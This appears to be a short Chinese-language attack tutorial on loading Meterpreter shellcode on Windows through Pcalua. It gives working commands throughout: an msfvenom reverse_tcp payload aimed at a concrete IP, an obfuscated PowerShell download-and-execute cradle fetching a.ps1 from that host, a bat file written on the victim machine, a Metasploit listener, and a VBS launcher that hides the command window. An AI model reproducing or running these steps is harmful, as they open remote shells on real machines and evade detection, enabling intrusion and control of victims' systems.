一、Pcalua加载shellcode
1、msfvenom生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps1
2、混淆处理
powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.ps1'')) ';IEX ($a+$b)"
3、被攻击机写入bat
type nul > 1.bat
echo powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.ps1'')) ';IEX ($a+$b)"> 1.bat
4、msf设置监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 39.104.56.140
set LPORT 7100
exploit
5、cmd Pcalua运行1.bat
Pcalua -m -a 1.bat
二、powershell混淆
1、
powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://x.X.X.X:7200/a.ps1''))';IEX ($a+$b)"
2、通过vbs执行bat不会弹出cmd
3、vbs文件
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c start.bat",vbhide
4、结束